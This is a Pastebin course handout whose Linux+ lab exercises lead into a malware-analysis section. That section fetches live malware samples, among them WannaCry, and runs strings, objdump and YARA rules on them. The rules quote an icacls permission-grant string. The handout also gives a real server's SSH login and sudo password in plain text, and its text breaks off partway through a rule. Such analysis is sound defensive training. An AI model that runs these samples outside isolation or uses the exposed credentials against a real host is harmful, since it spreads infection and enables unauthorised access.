Advertisement
joemccray

2020 Intro to Linux & Comptia Linux+ Exam Prep

Oct 21st, 2019
1,258
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #############################
  2. ############################## # Day 1: Linux Fundamentals # ##############################
  3. #############################
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12. #####################################################
  13. # 2020 Intro to Linux & Comptia Linux+ Exam Prep #
  14. # By Joe McCray #
  15. #####################################################
  16.  
  17. - Here is a good set of slides for getting started with Linux:
  18. http://www.slideshare.net/olafusimichael/linux-training-24086319
  19.  
  20.  
  21. - Here is a good tutorial that you should complete before doing the labs below:
  22. http://linuxsurvival.com/linux-tutorial-introduction/
  23.  
  24.  
  25. - I prefer to use Putty to SSH into my Linux host.
  26. - You can download Putty from here:
  27. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  28.  
  29. Here is the information to put into putty
  30.  
  31. Host Name: 149.28.201.171
  32. protocol: ssh
  33. port: 22
  34. username: linuxtraining
  35. password: linux!training123!
  36.  
  37.  
  38. ########################
  39. # Basic Linux Commands #
  40. ########################
  41.  
  42. ---------------------------Type This-----------------------------------
  43. cd ~
  44.  
  45. pwd
  46.  
  47. whereis pwd
  48.  
  49. which pwd
  50.  
  51. sudo find / -name pwd
  52.  
  53. /bin/pwd
  54.  
  55. cd ~/students/
  56.  
  57. mkdir yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please
  58.  
  59. cd yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please
  60.  
  61. touch one two three
  62.  
  63. ls -l t (without pressing the Enter key, press the Tab key twice. What happens?)
  64.  
  65. h (and again without pressing the Enter key, press the Tab key twice. What happens?)
  66.  
  67. Press the 'Up arrow key' (What happens?)
  68.  
  69. Press 'Ctrl-A' (What happens?)
  70.  
  71. ls
  72.  
  73. clear (What happens?)
  74.  
  75. echo one > one
  76.  
  77. cat one (What happens?)
  78.  
  79. man cat (What happens?)
  80. q
  81.  
  82. cat two
  83.  
  84. cat one > two
  85.  
  86. cat two
  87.  
  88. cat one two > three
  89.  
  90. cat three
  91.  
  92. echo four >> three
  93.  
  94. cat three (What happens?)
  95.  
  96. wc -l three
  97.  
  98. man wc
  99. q
  100.  
  101. info wc
  102. q
  103.  
  104. cat three | grep four
  105.  
  106. cat three | grep one
  107.  
  108. man grep
  109. q
  110.  
  111.  
  112. man ps
  113. q
  114.  
  115. ps
  116.  
  117. ps aux
  118.  
  119. ps aux | less
  120.  
  121. Press the 'Up arrow key' (What happens?)
  122.  
  123. Press the 'Down arrow key' (What happens?)
  124. q
  125.  
  126. top
  127. q
  128. -----------------------------------------------------------------------
  129.  
  130.  
  131. #########
  132. # Files #
  133. #########
  134. ---------------------------Type This-----------------------------------
  135. cd ~
  136.  
  137. pwd
  138.  
  139. cd ~/students/yourname/
  140.  
  141. pwd
  142.  
  143. ls
  144.  
  145. mkdir LinuxBasics
  146.  
  147. cd LinuxBasics
  148.  
  149. pwd
  150.  
  151. ls
  152.  
  153. mkdir files
  154.  
  155. touch one two three
  156.  
  157. cp one files/
  158.  
  159. ls files/
  160.  
  161. cd files/
  162.  
  163. cp ../two .
  164.  
  165. ls
  166.  
  167. cp ../three .
  168.  
  169. ls
  170.  
  171. tar cvf files.tar *
  172.  
  173. ls
  174.  
  175. gzip files.tar
  176.  
  177. ls
  178.  
  179. rm -rf one two three
  180.  
  181. ls
  182.  
  183. tar -zxvf files.tar.gz
  184.  
  185. rm -rf files.tar.gz
  186.  
  187. zip data *
  188.  
  189. unzip -l data.zip
  190.  
  191. mkdir /tmp/yourname/
  192.  
  193. unzip data.zip -d /tmp/yourname/
  194. -----------------------------------------------------------------------
  195.  
  196.  
  197.  
  198. ############
  199. # VIM Demo #
  200. ############
  201. ---------------------------Type This-----------------------------------
  202. cd ~/students/yourname/LinuxBasics
  203.  
  204. mkdir vimlesson
  205.  
  206. cd vimlesson
  207.  
  208. vi lesson1.sh
  209.  
  210. i (press "i" to get into INSERT mode and then paste in the lines below)
  211.  
  212. #!/bin/bash
  213.  
  214. echo "This is my first time using vi to create a shell script"
  215. echo " "
  216. echo " "
  217. echo " "
  218. sleep 5
  219. echo "Ok, now let's clear the screen"
  220. sleep 3
  221. clear
  222.  
  223.  
  224. ---------------don't put this line in your script----------------------------
  225.  
  226. ESC (press the ESC key to get you out of INSERT mode)
  227.  
  228. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  229.  
  230.  
  231. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  232.  
  233.  
  234.  
  235. vi lesson1.sh
  236.  
  237. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  238.  
  239. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  240.  
  241. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  242.  
  243.  
  244.  
  245.  
  246. vi lesson1.sh
  247.  
  248. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  249.  
  250. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  251.  
  252.  
  253. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  254.  
  255. /echo (typing "/echo" immediately after SHIFT: will search the file for the word echo).
  256.  
  257. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  258.  
  259. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  260.  
  261.  
  262.  
  263.  
  264. vi lesson1.sh
  265.  
  266. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  267.  
  268. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  269.  
  270.  
  271. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  272.  
  273. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  274.  
  275. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  276.  
  277. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  278.  
  279.  
  280.  
  281.  
  282. vi lesson1.sh
  283.  
  284. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  285.  
  286. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  287.  
  288.  
  289. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  290.  
  291. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  292.  
  293. dd (typing "dd" will delete the line that you are on)
  294.  
  295. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  296.  
  297. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  298.  
  299.  
  300.  
  301.  
  302. vi lesson1.sh
  303.  
  304. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  305.  
  306. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  307.  
  308.  
  309. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  310.  
  311. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  312.  
  313. dd (typing "dd" will delete the line that you are on)
  314.  
  315. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  316.  
  317. syntax on (typing "syntax on" immediately after SHIFT: will turn on syntax highlighting
  318.  
  319. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  320.  
  321. set tabstop=5 (typing "set tabstop=5" immediately after SHIFT: will set your tabs to 5 spaces
  322.  
  323. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  324.  
  325. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  326.  
  327.  
  328.  
  329.  
  330. vi .vimrc
  331. i (press "i" to get into INSERT mode and then paste in the lines below)
  332.  
  333.  
  334. set number
  335. syntax on
  336. set tabstop=5
  337.  
  338. ESC (press the ESC key to get you out of INSERT mode)
  339.  
  340. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  341.  
  342. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  343.  
  344.  
  345.  
  346.  
  347.  
  348.  
  349. vi lesson1.sh
  350.  
  351. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  352.  
  353. echo $MYVIMRC (typing "echo $MYVIMRC" immediately after SHIFT: will display the path to your new .vimrc file
  354.  
  355. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  356.  
  357. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  358. -----------------------------------------------------------------------
  359.  
  360.  
  361.  
  362.  
  363.  
  364.  
  365.  
  366.  
  367. ###############
  368. # Permissions #
  369. ###############
  370. ---------------------------Type This-----------------------------------
  371. cd ~/students/yourname/LinuxBasics
  372.  
  373. ls -l one
  374. -----------------------------------------------------------------------
  375. We can determine a lot from examining the results of this command. The file "one" is owned by user "me".
  376. Now "me" has the right to read and write this file.
  377. The file is owned by the group "me". Members of the group "me" can also read and write this file.
  378. Everybody else can read this file
  379.  
  380.  
  381. ---------------------------Type This-----------------------------------
  382. ls -l /bin/bash
  383. -----------------------------------------------------------------------
  384.  
  385. Here we can see:
  386.  
  387. The file "/bin/bash" is owned by user "root". The superuser has the right to read, write, and execute this file.
  388. The file is owned by the group "root". Members of the group "root" can also read and execute this file. Everybody else can read and execute this file
  389.  
  390.  
  391. The next command you need to know is "chmod"
  392. rwx rwx rwx = 111 111 111
  393. rw- rw- rw- = 110 110 110
  394. rwx --- --- = 111 000 000
  395.  
  396. and so on...
  397.  
  398. rwx = 111 in binary = 7
  399. rw- = 110 in binary = 6
  400. r-x = 101 in binary = 5
  401. r-- = 100 in binary = 4
  402.  
  403.  
  404. ---------------------------Type This-----------------------------------
  405. ls -l one
  406.  
  407. chmod 600 one
  408.  
  409. ls -l one
  410.  
  411. sudo useradd yourname
  412. aegisweaponssystem
  413.  
  414.  
  415. sudo passwd yourname
  416.  
  417. P@$$w0rd321
  418. P@$$w0rd321
  419.  
  420. sudo chown testuser one
  421. aegisweaponssystem
  422.  
  423. ls -l one
  424.  
  425. sudo chgrp testuser one
  426. aegisweaponssystem
  427.  
  428. ls -l one
  429.  
  430. id
  431.  
  432. su testuser
  433. P@$$w0rd321
  434. -----------------------------------------------------------------------
  435.  
  436. Here is a table of numbers that covers all the common settings. The ones beginning with "7" are used with programs (since they enable execution) and the rest are for other kinds of files.
  437.  
  438. Value Meaning
  439. 777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.
  440.  
  441. 755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.
  442.  
  443. 700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.
  444.  
  445. 666 (rw-rw-rw-) All users may read and write the file.
  446.  
  447. 644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.
  448.  
  449. 600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.
  450.  
  451.  
  452.  
  453. Directory permissions
  454. ---------------------
  455. The chmod command can also be used to control the access permissions for directories. In most ways, the permissions scheme for directories works the same way as they do with files. However, the execution permission is used in a different way. It provides control for access to file listing and other things. Here are some useful settings for directories:
  456.  
  457. Value Meaning
  458. 777 (rwxrwxrwx) No restrictions on permissions.
  459. Anybody may list files, create new files in the directory and delete files in the directory.
  460. Generally not a good setting.
  461.  
  462.  
  463.  
  464. 755 (rwxr-xr-x) The directory owner has full access.
  465. All others may list the directory, but cannot create files nor delete them.
  466. This setting is common for directories that you wish to share with other users.
  467.  
  468.  
  469.  
  470. 700 (rwx------) The directory owner has full access. Nobody else has any rights. This setting is useful for directories that only the owner may use and must be kept private from others.
  471.  
  472. ######################
  473. # Process Management #
  474. ######################
  475. ---------------------------Type This-----------------------------------
  476. top
  477. q
  478.  
  479. htop
  480. q
  481.  
  482. ps
  483.  
  484. ps aux
  485.  
  486. ps -A
  487.  
  488. ps -A | less
  489.  
  490. ps axjf
  491.  
  492. pstree
  493.  
  494. pstree -A
  495.  
  496. pgrep bash
  497.  
  498. pgrep init
  499.  
  500. ps aux | grep apache
  501. -----------------------------------------------------------------------
  502.  
  503.  
  504.  
  505. You can list all of the signals that are possible to send with kill by typing:
  506. ---------------------------Type This-----------------------------------
  507. kill -l
  508.  
  509. sudo kill -HUP pid_of_apache
  510.  
  511. The pkill command works in almost exactly the same way as kill, but it operates on a process name instead:
  512.  
  513. pkill -9 ping
  514. The above command is the equivalent of:
  515.  
  516. kill -9 `pgrep ping`
  517. -----------------------------------------------------------------------
  518.  
  519.  
  520.  
  521.  
  522. ################
  523. # Hashing Demo #
  524. ################
  525. ---------------------------Type This-----------------------------------
  526. cd ~/students/yourname/LinuxBasics
  527.  
  528. mkdir hashdemo
  529.  
  530. cd hashdemo
  531.  
  532. echo test > test.txt
  533.  
  534. cat test.txt
  535.  
  536. md5sum test.txt
  537.  
  538. echo hello >> test.txt
  539.  
  540. cat test.txt
  541.  
  542. md5sum test.txt
  543.  
  544. echo test2 > test2.txt
  545.  
  546. cat test2.txt
  547.  
  548. sha256sum test2.txt
  549.  
  550. echo hello >> test2.txt
  551.  
  552. cat test2.txt
  553.  
  554. sha256sum test2.txt
  555.  
  556. cd ..
  557. -----------------------------------------------------------------------
  558.  
  559.  
  560.  
  561. #################################
  562. # Symmetric Key Encryption Demo #
  563. #################################
  564. ---------------------------Type This-----------------------------------
  565. cd ~/students/yourname/LinuxBasics
  566.  
  567. mkdir gpgdemo
  568.  
  569. cd gpgdemo
  570.  
  571. echo test > test.txt
  572.  
  573. cat test.txt
  574.  
  575. gpg -c test.txt
  576. password
  577. password
  578.  
  579. ls | grep test
  580.  
  581. cat test.txt
  582.  
  583. cat test.txt.gpg
  584.  
  585. rm -rf test.txt
  586.  
  587. ls | grep test
  588.  
  589. gpg -o output.txt test.txt.gpg
  590. P@$$w0rD!@#$P@$$w0rD!@#$
  591.  
  592. cat output.txt
  593. -----------------------------------------------------------------------
  594.  
  595.  
  596.  
  597. #########################################################################################################################
  598. # Asymmetric Key Encryption Demo #
  599. # #
  600. # Configure random number generator #
  601. # https://www.howtoforge.com/helping-the-random-number-generator-to-gain-enough-entropy-with-rng-tools-debian-lenny #
  602. #########################################################################################################################
  603. ---------------------------Type This-----------------------------------
  604. cd ~/students/yourname/LinuxBasics/gpgdemo
  605.  
  606. echo hello > file1.txt
  607.  
  608. echo goodbye > file2.txt
  609.  
  610. echo green > file3.txt
  611.  
  612. echo blue > file4.txt
  613.  
  614. tar czf files.tar.gz *.txt
  615.  
  616. gpg --gen-key
  617. 1
  618. 1024
  619. 0
  620. y
  621. John Doe
  622. john@doe.com
  623. --blank comment--
  624. O
  625. P@$$w0rD!@#$P@$$w0rD!@#$
  626. P@$$w0rD!@#$P@$$w0rD!@#$
  627.  
  628.  
  629.  
  630. gpg --armor --output file-enc-pubkey.txt --export 'John Doe'
  631.  
  632. cat file-enc-pubkey.txt
  633.  
  634. gpg --armor --output file-enc-privkey.asc --export-secret-keys 'John Doe'
  635.  
  636. cat file-enc-privkey.asc
  637.  
  638. gpg --encrypt --recipient 'John Doe' files.tar.gz
  639.  
  640. rm -rf files.tar.gz *.txt
  641.  
  642. ls
  643.  
  644. tar -zxvf files.tar.gz.gpg
  645.  
  646. gpg --output output.tar.gz --decrypt files.tar.gz.gpg
  647. P@$$w0rD!@#$P@$$w0rD!@#$
  648.  
  649. tar -zxvf output.tar.gz
  650.  
  651. ls
  652. -----------------------------------------------------------------------
  653.  
  654.  
  655.  
  656. ##############################################
  657. # Log Analysis with Linux command-line tools #
  658. ##############################################
  659. - The following command line executables are found in the Mac as well as most Linux Distributions.
  660.  
  661. cat – prints the content of a file in the terminal window
  662. grep – searches and filters based on patterns
  663. awk – can sort each row into fields and display only what is needed
  664. sed – performs find and replace functions
  665. sort – arranges output in an order
  666. uniq – compares adjacent lines and can report, filter or provide a count of duplicates
  667.  
  668.  
  669.  
  670.  
  671.  
  672. ##############
  673. # Cisco Logs #
  674. ##############
  675. ---------------------------Type This-----------------------------------
  676. cd ~/students/yourname/
  677. mkdir security
  678. cd security
  679. mkdir log_analysis
  680. cd log_analysis
  681. wget http://45.63.104.73/cisco.log
  682. -----------------------------------------------------------------------
  683.  
  684.  
  685. AWK Basics
  686. ----------
  687. - To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
  688. ---------------------------Type This-----------------------------------
  689. cat cisco.log | awk '{print $5}' | tail -n 4
  690. -----------------------------------------------------------------------
  691.  
  692.  
  693.  
  694. - Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
  695. ---------------------------Type This-----------------------------------
  696. cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
  697. -----------------------------------------------------------------------
  698.  
  699.  
  700.  
  701. - While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
  702. ---------------------------Type This-----------------------------------
  703. cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
  704. -----------------------------------------------------------------------
  705.  
  706.  
  707.  
  708.  
  709. - Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
  710. ---------------------------Type This-----------------------------------
  711. cat cisco.log | grep %LINEPROTO-5-UPDOWN:
  712.  
  713. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
  714.  
  715. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
  716.  
  717. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
  718. -----------------------------------------------------------------------
  719.  
  720.  
  721.  
  722.  
  723.  
  724. ##################
  725. # Day 1 Homework #
  726. ##################
  727. Task Option 1: Linux Survival
  728. -----------------------------
  729. Do all of the exercises in Linux Survival (http://linuxsurvival.com/linux-tutorial-introduction/)
  730. Create a word document that contains the screenshots of the quizzes NOTE: You must score a perfect 100 for all 4 quizzes
  731. Name the word document 'YourFirstName-YourLastName-LinuxDay1-LinuxSurvival.docx' (ex: 'Joseph-McCray-LinuxDay1-LinuxSurvival.docx')
  732. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  733.  
  734.  
  735. Task Option 2: Basic Shell Scripting
  736. ------------------------------------
  737. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=_n5ZegzieSQ
  738. Create a word document that contains the screenshots of the tasks performed in this video
  739. Name the word document 'YourFirstName-YourLastName-LinuxDay1-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay1-ShellScripting.docx')
  740. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  741.  
  742.  
  743.  
  744.  
  745.  
  746.  
  747.  
  748.  
  749.  
  750.  
  751.  
  752.  
  753.  
  754. ###########################
  755. ############################## # Day 2: Malware Analysis # ##############################
  756. ###########################
  757.  
  758.  
  759.  
  760. ################
  761. # The Scenario #
  762. ################
  763. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts). The fastest thing you can do is perform static analysis.
  764.  
  765.  
  766.  
  767. ####################
  768. # Malware Analysis #
  769. ####################
  770.  
  771.  
  772.  
  773. - After logging please open a terminal window and type the following commands:
  774. ---------------------------Type This-----------------------------------
  775. cd ~/students/yourname/security/
  776. mkdir malware_analysis
  777. cd malware_analysis
  778. -----------------------------------------------------------------------
  779.  
  780. - This is actual Malware (remember to run it in a VM - the password to extract it is 'infected':
  781.  
  782. ---------------------------Type This-----------------------------------
  783. wget https://infosecaddicts-files.s3.amazonaws.com/malware-password-is-infected.zip --no-check-certificate
  784. wget https://infosecaddicts-files.s3.amazonaws.com/analyse_malware.py --no-check-certificate
  785. wget https://infosecaddicts-files.s3.amazonaws.com/wannacry.zip --no-check-certificate
  786.  
  787. unzip malware-password-is-infected.zip
  788. infected
  789.  
  790. file malware.exe
  791.  
  792. mv malware.exe malware.pdf
  793.  
  794. file malware.pdf
  795.  
  796. mv malware.pdf malware.exe
  797.  
  798. hexdump -n 2 -C malware.exe
  799. -----------------------------------------------------------------------
  800.  
  801.  
  802. ***What is '4d 5a' or 'MZ'***
  803. Reference:
  804. http://www.garykessler.net/library/file_sigs.html
  805.  
  806.  
  807.  
  808.  
  809.  
  810.  
  811.  
  812.  
  813. ---------------------------Type This-----------------------------------
  814. objdump -x malware.exe
  815.  
  816. strings malware.exe
  817.  
  818. strings --all malware.exe | head -n 6
  819.  
  820. strings malware.exe | grep -i dll
  821.  
  822. strings malware.exe | grep -i library
  823.  
  824. strings malware.exe | grep -i reg
  825.  
  826. strings malware.exe | grep -i hkey
  827.  
  828. strings malware.exe | grep -i hku
  829. -----------------------------------------------------------------------
  830. - We didn't see anything like HKLM, HKCU or other registry type stuff
  831.  
  832.  
  833. ---------------------------Type This-----------------------------------
  834. strings malware.exe | grep -i irc
  835.  
  836. strings malware.exe | grep -i join
  837.  
  838. strings malware.exe | grep -i admin
  839.  
  840. strings malware.exe | grep -i list
  841. -----------------------------------------------------------------------
  842.  
  843. - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  844.  
  845. ---------------------------Type This-----------------------------------
  846. vi analyse_malware.py
  847.  
  848. python analyse_malware.py malware.exe
  849. -----------------------------------------------------------------------
  850.  
  851.  
  852.  
  853.  
  854.  
  855.  
  856.  
  857.  
  858. - After logging please open a terminal window and type the following commands:
  859. ---------------------------Type This-----------------------------------
  860. cd ~/students/yourname/security/malware_analysis
  861.  
  862. unzip wannacry.zip
  863. infected
  864.  
  865. file wannacry.exe
  866.  
  867. mv wannacry.exe malware.pdf
  868.  
  869. file malware.pdf
  870.  
  871. mv malware.pdf wannacry.exe
  872.  
  873. hexdump -n 2 -C wannacry.exe
  874. -----------------------------------------------------------------------
  875.  
  876.  
  877.  
  878. ***What is '4d 5a' or 'MZ'***
  879. Reference:
  880. http://www.garykessler.net/library/file_sigs.html
  881.  
  882.  
  883.  
  884.  
  885. ---------------------------Type This-----------------------------------
  886. objdump -x wannacry.exe
  887.  
  888. strings wannacry.exe
  889.  
  890. strings --all wannacry.exe | head -n 6
  891.  
  892. strings wannacry.exe | grep -i dll
  893.  
  894. strings wannacry.exe | grep -i library
  895.  
  896. strings wannacry.exe | grep -i reg
  897.  
  898. strings wannacry.exe | grep -i key
  899.  
  900. strings wannacry.exe | grep -i rsa
  901.  
  902. strings wannacry.exe | grep -i open
  903.  
  904. strings wannacry.exe | grep -i get
  905.  
  906. strings wannacry.exe | grep -i mutex
  907.  
  908. strings wannacry.exe | grep -i irc
  909.  
  910. strings wannacry.exe | grep -i join
  911.  
  912. strings wannacry.exe | grep -i admin
  913.  
  914. strings wannacry.exe | grep -i list
  915. -----------------------------------------------------------------------
  916.  
  917.  
  918.  
  919.  
  920.  
  921.  
  922. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  923.  
  924. Quick Google search for "wannacry ransomeware analysis"
  925.  
  926.  
  927. Reference
  928. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  929.  
  930. - Yara Rule -
  931.  
  932.  
  933. Strings:
  934. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  935. $s2 = “Wanna Decryptor” wide ascii nocase
  936. $s3 = “.wcry” wide ascii nocase
  937. $s4 = “WANNACRY” wide ascii nocase
  938. $s5 = “WANACRY!” wide ascii nocase
  939. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  940.  
  941.  
  942.  
  943.  
  944.  
  945.  
  946.  
  947.  
  948. Ok, let's look for the individual strings in our file
  949.  
  950.  
  951. ---------------------------Type This-----------------------------------
  952. strings wannacry.exe | grep -i ooops
  953.  
  954. strings wannacry.exe | grep -i wanna
  955.  
  956. strings wannacry.exe | grep -i wcry
  957.  
  958. strings wannacry.exe | grep -i wannacry
  959.  
  960. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  961. -----------------------------------------------------------------------
  962.  
  963.  
  964.  
  965.  
  966.  
  967. ################################
  968. # Good references for WannaCry #
  969. ################################
  970.  
  971. References:
  972.  
  973. https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
  974. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  975. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  976.  
  977.  
  978.  
  979.  
  980.  
  981.  
  982.  
  983.  
  984.  
  985.  
  986. ####################################
  987. # Tired of GREP - let's try Python #
  988. ####################################
  989. Decided to make my own script for this kind of stuff in the future. I
  990.  
  991. Reference1:
  992. https://infosecaddicts-files.s3.amazonaws.com/analyse_malware.py
  993.  
  994. This is a really good script for the basics of static analysis
  995.  
  996. Reference:
  997. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  998.  
  999.  
  1000. This is really good for showing some good signatures to add to the Python script
  1001.  
  1002.  
  1003. Here is my own script using the signatures (started this yesterday, but still needs work):
  1004. https://pastebin.com/guxzCBmP
  1005.  
  1006.  
  1007.  
  1008. ---------------------------Type This-----------------------------------
  1009. wget https://pastebin.com/raw/guxzCBmP
  1010.  
  1011.  
  1012. mv guxzCBmP am.py
  1013.  
  1014.  
  1015. vi am.py
  1016.  
  1017. python am.py wannacry.exe
  1018. -----------------------------------------------------------------------
  1019.  
  1020.  
  1021.  
  1022.  
  1023.  
  1024.  
  1025.  
  1026. ##############
  1027. # Yara Ninja #
  1028. ##############
  1029. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  1030.  
  1031. Quick Google search for "wannacry ransomeware analysis"
  1032.  
  1033.  
  1034. Reference
  1035. https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  1036.  
  1037.  
  1038.  
  1039. - Yara Rule -
  1040.  
  1041.  
  1042. Strings:
  1043. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  1044. $s2 = “Wanna Decryptor” wide ascii nocase
  1045. $s3 = “.wcry” wide ascii nocase
  1046. $s4 = “WANNACRY” wide ascii nocase
  1047. $s5 = “WANACRY!” wide ascii nocase
  1048. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  1049.  
  1050.  
  1051.  
  1052.  
  1053.  
  1054.  
  1055.  
  1056.  
  1057. Ok, let's look for the individual strings
  1058.  
  1059. ---------------------------Type This-----------------------------------
  1060.  
  1061.  
  1062. strings wannacry.exe | grep -i ooops
  1063.  
  1064. strings wannacry.exe | grep -i wanna
  1065.  
  1066. strings wannacry.exe | grep -i wcry
  1067.  
  1068. strings wannacry.exe | grep -i wannacry
  1069.  
  1070. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  1071.  
  1072.  
  1073. -----------------------------------------------------------------------
  1074.  
  1075.  
  1076.  
  1077.  
  1078. Let's see if we can get yara working.
  1079. ---------------------------Type This-----------------------------------
  1080. cd ~/students/yourname/security/malware_analysis
  1081.  
  1082. mkdir quick_yara
  1083.  
  1084. cd quick_yara
  1085. wget http://45.63.104.73/wannacry.zip
  1086.  
  1087. unzip wannacry.zip
  1088. **** password is infected ***
  1089. -----------------------------------------------------------------------
  1090.  
  1091.  
  1092.  
  1093.  
  1094.  
  1095. ---------------------------Type This-----------------------------------
  1096.  
  1097. nano wannacry_1.yar
  1098.  
  1099. ---------------------------Paste This-----------------------------------
  1100. rule wannacry_1 : ransom
  1101. {
  1102. meta:
  1103. author = "Joshua Cannell"
  1104. description = "WannaCry Ransomware strings"
  1105. weight = 100
  1106. date = "2017-05-12"
  1107.  
  1108. strings:
  1109. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  1110. $s2 = "Wanna Decryptor" wide ascii nocase
  1111. $s3 = ".wcry" wide ascii nocase
  1112. $s4 = "WANNACRY" wide ascii nocase
  1113. $s5 = "WANACRY!" wide ascii nocase
  1114. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  1115.  
  1116. condition:
  1117. any of them
  1118. }
  1119.  
  1120. ----------------------------------------------------------------------------
  1121.  
  1122.  
  1123.  
  1124.  
  1125.  
  1126. ---------------------------Type This-----------------------------------
  1127.  
  1128. yara wannacry_1.yar wannacry.exe
  1129.  
  1130. -----------------------------------------------------------------------
  1131.  
  1132.  
  1133.  
  1134.  
  1135.  
  1136. ---------------------------Type This-----------------------------------
  1137.  
  1138. nano wannacry_2.yar
  1139.  
  1140. ---------------------------Paste This-----------------------------------
  1141. rule wannacry_2{
  1142. meta:
  1143. author = "Harold Ogden"
  1144. description = "WannaCry Ransomware Strings"
  1145. date = "2017-05-12"
  1146. weight = 100
  1147.  
  1148. strings:
